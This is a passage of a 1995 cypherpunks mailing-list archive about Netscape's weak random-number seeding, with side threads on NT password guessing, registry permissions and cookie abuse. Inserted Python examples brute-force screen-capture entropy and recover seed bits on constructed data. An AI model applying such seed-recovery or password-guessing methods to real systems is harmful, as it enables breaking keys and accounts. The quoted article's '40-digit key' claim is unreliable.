                ^^^^^^
>whether it halts in X number of cycles. You could even get more
>than 1 bit out of it by measuring how many cycles it takes to halt
>(if it halts before X) and use the LSB. Is it as secure as
>the halting problem? (intractable to devise an algorithm used
>to predict a bit with more than 50% confidence if you knew the
>state table?) 

Your randomness will depend on the prior randomness of your original
input... and if you already have that, the TM won't give you any additional
randomness (rather, this approach will just take all the randomness you give
it and reduce it to 1 bit of randomness, losing all the rest).

On the other hand, if the 'random' program is not already truly random, then
you may well have patterns in the bits generated by the halting observation.
For instance, if you use a known PRNG to get your "random" programs, then
given the same seed you will end up with the same programs (and therefore
the same resulting 'random' bits from the TM halting output)... which, in
other words, gains you nothing AFAICS over simply using the PRNG's output
directly, except of course that it exercises your CPU. :-)  The attacker
still only needs to figure out the seed.

>Grab a picture of the current bitmap on your screen. Run it through
>a good compression algorithm (say, an arithmetic/Q-coder or
>one of the LZ schemes). Grab the LSB of every 4th byte or so.
>If the screen is size 1024*768*8, that's 786432 bytes. Let's assume
>a 10 to 1 compression ratio = 78643 bytes. Let's assume you take
>1 bit from every 10 byte, that's 983 bits of entropy.
>
>The screen will often contain data like:
>
>random placement of icons and windows

Not on my machine (or most others, I'd wager)!  I thought about this, and
whenever I'm running Netscape (for instance) my screen is probably identical
over 50% of the time because I tend to have the same things open when I run
a given program.

Even in the general case, consider that most people have a preferred desktop
layout (in Windows, they have ProgMan sitting in one place on the screen
with usually the same groups visible/open)... not only will that piece of
the screen bitmap not give you any randomness from one run to the next, but
unless you go looking for "things that haven't changed since last time" your
program won't even know what's reducing your randomness.

>current time

Better, but be careful how you use it; that's what Netscape thought too. :-)

>current applications running, and the data in their windows
>
>
>If Netscape was running for instance, part of the random bits
>would come from the bitmap representation of the data in Netscape's
>window which would depend on the URL being displayed.

This sounds a bit better... except, of course, that when you initiate a
secure session in Netscape with a specific party/server, your screen has a
very good chance of looking the same each time you connect with that entity
because it is the same URL. :-)

Would someone who's more informed please correct my analysis?  Thanks in
advance,

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019
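
The objection to the screen-capture scheme in this exchange can be checked directly. The following is an added example (not code from either poster): on a constructed, scaled-down 8-bit desktop where only the clock changes between runs, the compressed-and-sampled output is hundreds of bits long, yet anyone who knows the layout reproduces it by trying the 1,440 minutes of a day. The screen size, layout, palette values and URL are assumptions made for the illustration.

```python
import hashlib
import math
import zlib

WIDTH, HEIGHT = 320, 240      # constructed, scaled-down 8-bit screen
STRIDE = 10                   # one bit from every 10th byte of compressed data


def fill(bitmap, x0, y0, w, h, pixels):
    """Copy w*h palette indexes into the bitmap rectangle at (x0, y0)."""
    for row in range(h):
        start = (y0 + row) * WIDTH + x0
        bitmap[start:start + w] = pixels[row * w:(row + 1) * w]


def page_pixels(url, w, h):
    """Stand-in for a rendered page: bytes that depend only on the URL."""
    out = bytearray()
    counter = 0
    while len(out) < w * h:
        out += hashlib.sha256(f"{url}#{counter}".encode()).digest()
        counter += 1
    return bytes(out[:w * h])


def desktop(url):
    """A habitual layout: flat background, icon column, one browser window."""
    bitmap = bytearray([7]) * (WIDTH * HEIGHT)
    for i in range(5):        # icons sit in the same place on every run
        fill(bitmap, 4, 4 + 40 * i, 24, 24, bytes([20 + i]) * (24 * 24))
    fill(bitmap, 60, 30, 120, 80, page_pixels(url, 120, 80))
    return bitmap


def with_clock(base, minute_of_day):
    """Draw HH:MM as four 8x8 blocks whose palette index encodes each digit."""
    bitmap = bytearray(base)
    hh, mm = divmod(minute_of_day, 60)
    for pos, digit in enumerate(f"{hh:02d}{mm:02d}"):
        fill(bitmap, 280 + 9 * pos, 228, 8, 8, bytes([100 + int(digit)]) * 64)
    return bitmap


def screen_bits(bitmap):
    """The proposed extraction: compress, keep the LSB of every STRIDE-th byte."""
    packed = zlib.compress(bytes(bitmap))
    return "".join(str(b & 1) for b in packed[::STRIDE])


def candidates_matching(observed, url):
    """Knowing layout and URL, try every minute of the day against the output."""
    base = desktop(url)
    return [m for m in range(24 * 60)
            if screen_bits(with_clock(base, m)) == observed]


if __name__ == "__main__":
    url = "https://shop.example/checkout"      # constructed URL
    now = 9 * 60 + 41                          # 09:41
    bits = screen_bits(with_clock(desktop(url), now))
    hits = candidates_matching(bits, url)
    print(len(bits), "output bits; search space", 24 * 60,
          "=> at most %.1f bits of entropy" % math.log2(24 * 60))
    print("minutes reproducing the output:", hits)
```

The length of the extracted bit string says nothing about its unpredictability; the bound is the logarithm of the number of screens the other side has to consider.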





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank A Stevenson <frank@funcom.no>
Date: Wed, 27 Sep 95 00:50:40 PDT
To: Jeff Weinstein <jsw@netscape.com>
Subject: netscape NSRANDFILE compatible with /dev/random ?
In-Reply-To: <9509261428.ZM150@tofuhut>
Message-ID: <Pine.SGI.3.91.950927082835.1586B-100000@odin>
MIME-Version: 1.0
Content-Type: text/plain



What happens if NSRANDFILE is set to /dev/random ?
will netscape try to read an infinite number of random bytes ?

> ...
> do it.  Instead of reading ~/.pgp/randseed.bin, we now get the name
> of a file from the environment variable NSRANDFILE, and pass that
> file's contents through the RNG seed hash.  If you decide that it's
> safe, you can set the env variable to point to your randseed.bin file,
> or any other file of random bits you care to use.
> ...
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.

  Frank




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 27 Sep 95 05:35:34 PDT
To: cypherpunks@toad.com
Subject: FT on NsCPunxsters
Message-ID: <199509271235.IAA07479@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times, Sept 27, 1995

   Cracks in the code

   Peter Martin calls for an easing of US restrictions on
   the export of encryption technology


   Encryption used to be a subject of interest only to spies
   and mathematicians. But the central role that the
   electronic transmission of information is playing in
   commerce and society make it now a technology of enormous
   practical relevance. Two recent stories out of many
   exemplify this trend.

   Citibank lost $400,000, it is alleged, to a Russian hacker
   who managed to crack its clients' passwords. The solution
   to this security problem: a new generation of encrypted
   passwords that are much harder to crack.

   And Netscape Navigator, the leading "browser" program for
   the Internet's fast-growing World Wide Web, has been shown
   to have flaws in its encryption routine. In theory at
   least, these make it possible for outsiders to read
   encrypted data sent over the net -- such as credit card
   numbers. Netscape acknowledges the problems and says it
   will have fixes available by today.

   Is this crucial technology vulnerable to determined attack
   by hackers and fraudsters?

   Before considering the question, remember that the
   introduction of any new technology highlights risks
   uncomplainingly borne for years. The safety precautions
   demanded of the Channel tunnel are one example, as compared
   with those required of traditional trains or ferries.

   Similarly, it is argued, people have been unhesitatingly
   using analogue mobile phones, reading credit card details
   over the telephone, and sending off faxes into the ether
   without any of the panic that now surrounds the issue of
   Internet security.

   The comparison is an instructive one, but not entirely
   fair. What worries Internet users is not so much that a
   determined enemy might target them for eavesdropping, or
   even that chance might put their credit card details in the
   hands of a dishonest person.

   Instead, they worry about the Internet's unstructured
   nature under which messages are passed from computer to
   computer across the world until they reach their final
   destination.

   In principle, this would allow a criminal to leave a
   "sniffer" program lurking, electronically, at one of the
   nodes, recognising credit card numbers as they passed by,
   and scooping them up for subsequent exploitation. People
   also fear an attack on the computers of merchants selling
   goods over the Internet -- each containing thousands of
   credit card numbers. The fear is thus not one of random
   theft but of systematic brigandage.

   Encryption is all that stops such fears paralysing
   electronic commerce before it has properly begun. It is
   therefore in the general public interest that effective
   encryption be widely available.

   The Netscape problem illustrates how easy it is for the
   inherent mathematical strengths of a modern encryption
   scheme to be overcome by an oversight in its supporting
   plumbing. One of the faults in Netscape's encryption, for
   example, stems from too predictable a method of generating
   the random numbers needed to make the scheme work.

   It also illustrates how, once a code-breaker's task is
   simplified by such a weakness, today's powerful networks of
   cheap computers make it quick to crack even the most
   sophisticated encryption schemes. The narrower the range of
   numbers through which the cracker's computers must sift in
   order to find a meaningful answer, the greater the
   probability of breaking the code within a useful amount of
   time.

   All the more reason, then, for non-Americans to view with
   dismay a US policy which restricts the international
   distribution of the most powerful forms of encryption. For
   national security reasons, the US insists that the version
   of Netscape sold outside North America must contain a
   weaker form of encryption than that available to Americans
   and Canadians.

   The international version is restricted to a 40-digit
   "key", while the North American version uses 128 digits.
   The longer the key, the greater the time and computing
   power required for the code to be cracked. In principle,
   given enough computing power, even a message encoded by a
   very long key could be cracked in time. In practice,
   however, the task of cracking many millions of messages to
   find one that is of interest makes messages secure as long
   as the key has enough digits.

   Amateur code-crackers claim to have broken the 40-digit
   version of the Netscape encryption scheme. Their claim is
   hard to verify. But there is no doubt of the weakness in
   the random-number generation procedure; Netscape has
   verified it.

   This fault is common to both North American and export
   versions of the program, so it does not result from the US
   government restrictions on key length. The occasion reminds
   us, however, that effective encryption is essential to the
   growth of electronic commerce. And it teaches us that
   simplifying the code-breaker's task -- by error in
   Netscape's case, by deliberate diktat in the case of the
   government restriction -- is an easy way to make transmissions
   vulnerable.

   There was never much justification for the US determination
   to weaken exported encryption products. There is less now.

   [End]

---------

   NYT, Sept 27, 1995

   Russians Arrest 6 In Computer Thefts

   St. Petersburg, Russia, Sept 26 (AP) -- Russian police
   officers have arrested six more people in a $10 million
   computer theft from Citibank here, but the masterminds are
   said to remain at large.

   An officer in the organized crime division was quoted by
   the Itar-Tass news agency as saying that six people had
   been arrested in St. Petersburg on swindling charges
   stemming from the case involving Citibank, the chief unit
   of Citicorp. Weapons and tax-evasion charges may also be
   filed.

   The police confiscated two computers and a number of
   computer diskettes, plus weapons and cash from the
   suspects.

   Bank and law-enforcement officials say a gang of thieves in
   St. Petersburg broke into Citibank's electronic
   cash-management system scores of times and transferred
   money into their own accounts.

   Several people have been arrested abroad and face charges
   in the United States, including Vladimir Levin, 28,
   reportedly the group's computer hacker.

   Citibank officials said they recovered all but $400,000 and
   upgraded the cash-management system's electronic security
   after the theft.

   [End]

---------

   FT, Sept 21, 1995.

   Extradition in Citibank hacking case

   A British court yesterday approved the extradition to the
   US of Mr Vladimir Levin, the Russian science graduate
   accused of an attempted $10m (6.5m pounds) computer hacking
   fraud on Citibank. ...

   Mr Levin has been charged in the UK with offences under the
   Computer Misuse Act, forgery and false accounting. The US
   authorities are now drawing up similar charges to bring
   against him.

   Mr Levin is one of six people arrested over the alleged
   attempted fraud on Citibank. An FBI inquiry into the
   incident is continuing and it is believed that others are
   still being sought.

   When Mr Levin is returned to the US, he is likely to be
   closely questioned by the authorities, who are anxious to
   discover more of the technical details of the alleged
   attempted fraud.

   Mr Levin, who was arrested earlier this year travelling
   through Stansted airport in the UK, would appeal against
   the court's decision, his lawyers said. He has 14 days to
   lodge an appeal to the High Court in London. ...
   
   [End]











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 27 Sep 95 09:04:10 PDT
To: RJ Harvey <rjc@clark.net
Subject: Re: Hack Microsoft?
Message-ID: <199509271603.JAA23248@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



At 10:33 AM 9/26/95 EDT, Dan Bailey wrote:

>>For fun ways to hack NT, check out http://www.somar.com/security.html.
>> Some of these are really laughable.  You can use NT's LogonUser API
>>call to repeatedly guess passwords until you hit it, since NT offers
>>no way to limit number of login attempts.

At 12:10 PM 9/26/95 -0400, RJ Harvey wrote:
>   I don't believe that's correct; under User Manager, select
>the Account option under the Policies menu item; it lets you
>select whether to lock-out the account after a given number
>of invalid logon attempts, and to set the number.  The main
>problem here is that by default, I don't believe the 'lock out'
>option is enabled

Similarly there is an awful lot of other stuff that is left wide
open by default, most notably important parts of the registry, in particular
\HKEY_LOCAL_MACHINE\SOFTWARE 

Permissions on this are usually set to give every user write access, so that
every user can install software.  None of the installation programs
reset their registry key to exclude write access by anyone other than
the administrator or the person installing the program, as a result any
user can muck with the environment of any program installed by any other user.

As a result any user can force feed most programs strings which the 
program would ordinarily assume are internally generated, and can therefore
be trusted.  A low privilege user can muck with the internals of a program
installed by a high privilege user.

This of course is a bug in the installation programs, rather than a bug 
in the operating system, but it is an almost universal bug.

(But before you Unix folk gloat, consider how few Unix programs *have*
installation programs, also that Unix has no registry security problem
because it has no registry.)

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Wed, 27 Sep 95 06:25:00 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Notes" to be Eclipsed by "Netscape"
In-Reply-To: <ac8d7d09040210041c62@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950927091535.28140B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Sep 1995, Timothy C. May wrote:

> At 6:52 PM 9/25/95, Jon Lasser wrote:
> 
> >Perhaps the Notes pricing scheme is sooo outrageous (by the standards of
> >a student like myself, and probably most others, if it's still anything
> >like it was at the 1.0 release) that most people have had zero opportunity
> >to examine the program, let alone really have time to play with it?
> 
> I've never even _seen_ a copy of Notes running on any machine, nor do I
> know directly of _any_ of my colleagues who has. (Not saying nobody has, of
> course, just that I can't find anyone I know well who has.)

I've seen Notes running -- the Major-name discount software chain I used 
to work for (peon level) used it for communications.  It was slow and 
frustrating, but my access to it was only marginal... I certainly hadn't 
a chance to examine the code with a debugger, or even just play with it 
some.  But, knowing the software, it wouldn't surprise me if there were 
some serious bugs in the security code.

> My point? Notes is nearly invisible in the non-corporate community I now
> hang out in.
> 
> Who knows what weaknesses or bugs it has in it. Folks on our list probably
> don't have much familiarity with it.

Exactly... I think the product is guilty of security through obscurity, 
though I'm not sure it's particularly intended, just merely an artifact 
of the marketing strategy...

> My hunch is that, as the "Wall Street Journal" reported yesterday, that IBM
> overpaid for Lotus, that the notion of Notes becoming the universal
> collaboration/communication option is flawed.

Agreed.  OTOH, before the Web was known, it made a lot of sense for 
corporations...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Wed, 27 Sep 95 06:32:06 PDT
To: cypherpunks@toad.com
Subject: Hegel
Message-ID: <950927093027.2000cf@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain




James Caldwell wrote:

>On 25 Sep 95 at 0:06, Hroller Anonymous Remailer wrote:
>It's called the Hegelian Diclectic(sp?) first postulated by William
>Hegel (an ass) in Germany approx the 1600's as a method for social change
>when none could otherwise be achieved.

  Just for a reality check, Georg Wilhelm Hegel (1770-1831), was not an ass, 
  but rather a brilliant philosopher, even if you do like his views. I am 
  guessing you are referring to his "dialectic", which was simply an observation 
  of the way history worked:  Thesis <---> Antithesis
                                       |
                                   Synthesis

   The synthesis then becomes the new thesis and history moves. It was not
   proposed as a method of social change, but rather a description of how
   history moves. It is always better to have some idea of what you are talking
   about before you make such rash, critical statements. 

   Sorry for the noise to the list.

                              Bob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 27 Sep 95 06:36:36 PDT
To: Alan Olsen <alano@teleport.com>
Subject: Re: [NOISE] Re: Easter Eggs
In-Reply-To: <199509261959.MAA28501@desiree.teleport.com>
Message-ID: <9509271335.AA26916@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Tue, 26 Sep 1995 12:59:54 -0700
    From: Alan Olsen <alano@teleport.com>
    
    You also need X windows to find the Mozilla animated icon hack on
    Jammie Zawinski's page.
    ^^^^^^

Just for the record, that's Jamie.

    obNetscapeHack: There is a feature called a "cookie file" in
    Netscape that is ripe for exploitation as a security leak.  If you
    are using a Netscape server (and you may not even need that), you
    can feed all sorts of information into it without the user's
    knowledge.  I have heard of one page that overloads the cookie file
    until the machine runs out of drive space.  I am sure that there
    are other exploitable holes there...  Any takers?

Yikes!  That sounds really bad.  Do you have any more information on
this?  For example, can the server write to anything other than
$HOME/.netscape-cookies?  If I write protect that file, but it's still
owned by me, will Netscape still modify it?

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 27 Sep 95 07:00:11 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Security Update news release
In-Reply-To: <9509261733.AA22080@cantina.verity.com>
Message-ID: <199509271402.KAA23709@homeport.org>
MIME-Version: 1.0
Content-Type: text


| > >  Here is the press release we put out this morning regarding the fix
| > >for RNG seed and stack overflow problems.
| > 
| > Do the new versions use PGP's randseed.bin? If Netscape even only looks at
| > data used to keep PGP secure,  Netscape will be banned from my computer
| > and every computer I am responsible for. -- For good.
| 
| That doesn't quite make sense.  Netscape reading randseed.bin can have no
| effect on the security of PGP.

	I think you meant to say:

	"If md5 is a solid hash function, and if Netscape doesn't dump
core somewhere publicly readable, and if Netscape doesn't
accidentally have a stack overflow that causes your randseed.bin to
become confused with last-url-visited, then it is very unlikely that
Netscape reading your randseed.bin will have an effect on the security
of your PGP keys or messages."

	The history of people doing the impossible is too long to not
spell out your security assumptions.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Wed, 27 Sep 95 02:15:13 PDT
To: David_A Wagner <daw@cs.berkeley.edu>
Subject: Re: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509252031.NAA15134@quito.CS.Berkeley.EDU>
Message-ID: <199509270913.KAA17943@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| > Giving out contribution: 
| >      MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
| > Taking in contribution : 
| >      my_seed = my_seed XOR 
| >      (select_low_bits(remote_contrib, contrib_width) << contrib_area)
| > 
| 
| People seem to think this kind of thing is obviously safe.  I'm not yet
| convinced.

Well, I'm not either, actually. But I think this might be better
than the current state of affairs, where every bit of your seed
is almost guessable. And it might also be an intermediate solution
until there is a good random seed hardware generator in every computer.

| By xoring in a quantity *chosen by your adversary*, you're essentially
| allowing related-key attacks on your stream cipher.  (Your PRNG is just
| a stream cipher, keyed with my_seed.)

I think you mustn't allow any external partner to "contribute" at a
known and/or chosen offset into the buffer. You mustn't either accept 
"too much" contribution.

| No one knows how secure most ciphers are against related-key attacks:
| related-key attacks are known to be very powerful (often more powerful
| than any other type); but very little research on this topic is available.
| You're treading on unknown ground.

Yes. But I wonder whether this isn't really about the battle between
"the pragmatists" vs "the purists" point of view wrt security? I see so
many very unsophisticated attacks out there that a related-key attack,
although possible and powerful, still is rather unlikely.

Could you quantify how powerful a related-key attack is, compared to
some other kind of attack? I don't know anything about this kind of 
attack, do you have any references?

| There's also a small error in your specific algorithm.  Let
| 	 n = stop_bit - start_bit;
| presumably n is much less than the length of your seed.  Then a brute-force
| search over n bits will recover n bits of the seed -- this is a much faster
| cryptanalysis than a brute force over all bits of the seed.  This can
| probably be fixed by something like
| 	MD5(select_bits(MD5(my_seed))) -> remote,
| but the related-key uncertainties still remain.

Ok, noted. Maybe I should try to write down this "idea" for a proper review?
Hmmm.

/Christian
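
[Added example, not part of the original message or of any poster's code.] The "small error" quoted above can be checked directly: the outgoing contribution depends only on the n selected bits, so 2^n hashes recover them, while the suggested MD5(select_bits(MD5(my_seed))) form only gives away bits of a hash of the whole seed. The 128-bit seed width, the big-endian byte encoding and the sample seed are assumptions made for this sketch.

```python
import hashlib

SEED_BITS = 128  # assumed seed width; the thread does not fix one


def md5_int(value: int, n_bits: int) -> bytes:
    """MD5 of an n_bits-wide integer, big-endian, padded to whole bytes."""
    return hashlib.md5(value.to_bytes((n_bits + 7) // 8, "big")).digest()


def select_bits(value: int, start_bit: int, stop_bit: int) -> int:
    """Bits start_bit (inclusive) to stop_bit (exclusive), counted from bit 0."""
    return (value >> start_bit) & ((1 << (stop_bit - start_bit)) - 1)


def contribution_original(my_seed: int, start_bit: int, stop_bit: int) -> bytes:
    """MD5(select_bits(my_seed, start_bit, stop_bit)), as first proposed."""
    n = stop_bit - start_bit
    return md5_int(select_bits(my_seed, start_bit, stop_bit), n)


def contribution_prehashed(my_seed: int, start_bit: int, stop_bit: int) -> bytes:
    """MD5(select_bits(MD5(my_seed))), the repair suggested in the quoted reply."""
    hashed = int.from_bytes(md5_int(my_seed, SEED_BITS), "big")
    n = stop_bit - start_bit
    return md5_int(select_bits(hashed, start_bit, stop_bit), n)


def recover_window(contribution: bytes, n_bits: int):
    """Try all 2**n_bits windows; return the one whose digest matches."""
    for guess in range(1 << n_bits):
        if md5_int(guess, n_bits) == contribution:
            return guess
    return None


# Constructed sample values, not taken from any real system.
SEED = 0x3A91F0C45D27B86E19C4A7F2056BD3E8
START, STOP = 40, 56  # n = 16, so the search costs at most 65,536 hashes


def demo() -> dict:
    n = STOP - START
    leaked = recover_window(contribution_original(SEED, START, STOP), n)
    found = recover_window(contribution_prehashed(SEED, START, STOP), n)
    hashed = int.from_bytes(md5_int(SEED, SEED_BITS), "big")
    return {
        # The original form hands the receiver n real bits of the seed.
        "leaked_equals_seed_bits": leaked == select_bits(SEED, START, STOP),
        # The pre-hashed form yields n bits of MD5(seed), not of the seed.
        "prehashed_gives_only_hash_bits": found == select_bits(hashed, START, STOP),
    }


if __name__ == "__main__":
    print(demo())
```

As the quoted reply says, this repairs only the outgoing side; the related-key question about the incoming xor is untouched by it.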




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Wed, 27 Sep 95 07:27:40 PDT
To: Deranged Mutant <rrothenb@ic.sunysb.edu>
Subject: Re: PGP and FBI?
In-Reply-To: <199509270409.AAA00688@libws4.ic.sunysb.edu>
Message-ID: <Pine.SUN.3.91.950927101916.10713A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Sep 1995, Deranged Mutant wrote:

> There's some sort of documentary on WBAI 99.5 FM out of NYC now.
> They're talking about PGP and right wing militias... the guy being
> interviewed called PGP a "one time pad system" and doesn't understand
> it... *sigh*

Any more details on this?  I know people who do shows on BAI.  What
was the date/time of the show?  If this is true, it's pretty sad,
especially since BAI's well known for being a "political" station.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael H. Warfield <mhw@wittsend.com>
Date: Wed, 27 Sep 95 07:44:29 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape for OS/2, when? (Re: Another Netscape Bug)
In-Reply-To: <44a4kt$jda@tera.mcom.com>
Message-ID: <m0sxxW0-0000vwC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein enscribed thusly:
> 
> In article <199509261223.JAA01800@bud.peinet.pe.ca>, sentiono@cycor.ca (Sentiono Leowinata) writes:
> > On Tue, 26 Sep 1995 05:58:19 -0400 (EDT) you wrote:
> > 
> > >> It's not an exploit script, but you can find an auto crash "animation"
> > >> for Ray's discovered bug on 
> > >>   http://hplyot.obspm.fr/~dl/netscapesec/c1.html
> > >> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)
> > >Crashes the 16-bit Windows version 1.1N.
> > >DCF
> > 
> > Same here. For more information (not Netscape related), Web Explorer
> > 1.02 for OS/2 also crashes for the long URL.
> > I wish Netscape will port it to OS/2 (already ask them, but no comment
> > from Netscape). I don't try it on Netscape 1.1N as it doesn't run
> > reliably under Win-OS/2 (10 min -> crash! ;)
> 
>   My understanding is that OS/2 is supposed to be windows compatible,
> as in "better Windows than Windows".  If our windows app doesn't run
> on OS/2, then isn't it IBM's bug, not ours?
> 

	Well, I'll admit that the MTBF (Mean Time Between Failures) on
OS/2 would seem to be a little bit worse than the MTBGPF (Mean Time Between
General Protection Faults) on Windows, but not much.  If I run Netscape
continuously for more than 20 minutes or so, I'm almost certain to get a
GPF.  I've even got a few tricks which can do it immediately.  When it
first comes up, Maximize the window, then hit stop, then hit another link,
all before the Netscape Home Page is fully loaded.  Bang!  "The application
Netscape has caused a General Protection Fault in module...."  I've learned
to let the dust settle before touching too much.  BTW - This is true in
1.1N (16 bits) as well as 1.2N (32 bits) and even occurs in the "purchased"
browser (the office bought a copy).  Has been experienced on a half dozen
machines or so, 386, 486, and Pentium, with differing video drivers.

	I also occasionally experience a segmentation violation and core
dump while using Netscape 1.1N on Solaris.  Not very frequently, maybe once
every week or so, and I use UNIX A LOT MORE than Windows, so stability
is actually even better.

	A GPF on Windows is roughly equivalent to a segmentation violation
under UNIX since they both involve a pointer misuse resulting in an
illegal memory reference.  Main real difference is that a GPF on UNIX
rarely takes out the operating system while under Windows a GPF is a
general indication that something has committed random acts of terrorism
and Windows itself may be compromised.

> 	--Jeff

> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.

-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 27 Sep 95 10:27:39 PDT
To: Travis Corcoran <cypherpunks@toad.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <ac8ed65501021004cc69@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:28 PM 9/27/95, Travis Corcoran wrote:

>As the author of the package in question, I would like to point out:
>
>(1) the email msg Tim refers to (hereafter referred to by me as "query-mail")
>                was a request for information, not a warning

I've received several of these, not just the one Travis sent.

I don't sign my messages, never have, so I see no way this "agent" Travis
ran could find such a signed message from me. (It's conceivable he found
an old--really old--message with a faked-up sig, as perhaps for a
demonstration or spoof I was doing, but I'm skeptical. In any case, I
suspect only an "automated searcher" could find the one or two messages
that may look like this. If Travis produces the message here, I'm sure this
will be what the situation is.)

>(4) checking right now, I find that the finger command does indeed
>                fail to get a public key from Tim's address.
>
>(5) checking right now, I find that BAL's keyserver does indeed fail
>                to give any key with the address "tcmay@got.net"


Like I said, I don't sign messages. My PGP 2.0 key was signed at the second
CP meeting and, they tell me, submitted on the original MIT ring.
"tcmay@netcom.com" was my e-mail address at that time.


>A question: in a situation like this one, where an individual signed a
>message with a key then did not make a key with the return address of
>his message available either through his .plan, or a keyserver (the two
>de facto standards), what next step -if any- do people think is more
>appropriate than sending mail to the individual asking them for a copy
>of the key ?

Ignore it. Why hassle people who have no plan or finger configurations? (I
don't have a shell account.) Besides, people who really want to communicate
with me with PGP simply ask for it.

If you don't like this, fine. But don't robo-interrogate and send robo-warnings.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David_A Wagner <daw@CS.Berkeley.EDU>
Date: Wed, 27 Sep 95 10:48:23 PDT
To: cwe@it.kth.se (Christian Wettergren)
Subject: Re: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509270913.KAA17943@piraya.electrum.kth.se>
Message-ID: <199509271747.KAA01043@lagos.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> | > Giving out contribution: 
> | >      MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
> | > Taking in contribution : 
> | >      my_seed = my_seed XOR 
> | >      (select_low_bits(remote_contrib, contrib_width) << contrib_area)

So here's another attack on this scheme which I noticed today.
I'll assume you're using the Netscape/RSAREF PRNG:

	prng() {
		increment(my_seed);
		return(MD5(my_seed));
	}

Then an attacker can send you ``1'' as contribution.  This will
xor ``1 << contrib_area'' into your seed.  With probability 1/2,
this will be the same as subtracting ``1 << contrib_area'' from
your seed -- and in this case, your PRNG will repeat after
``1 << contrib_area'' more outputs.  This is much worse than the
expected 1 << 128 cycle length.


So this is an example of why it's dangerous to xor in values
*chosen by your adversary* to your seed.


> Could you quantify how powerful a related-key attack is, compared to
> some other kind of attack? I don't know anything about this kind of 
> attack, do you have any references?

I don't know about any work on related-key attacks on stream ciphers.
For block ciphers, related-key attacks are much stronger than other
attacks. (e.g. DES can be broken with ~ 2^28 related key queries and
about ~ 2^28 off-line computation steps)


Here's some references on related key attacks on block ciphers.  If
anyone can find any other work in this area, let me know!


@inproceedings{subkeys-important,
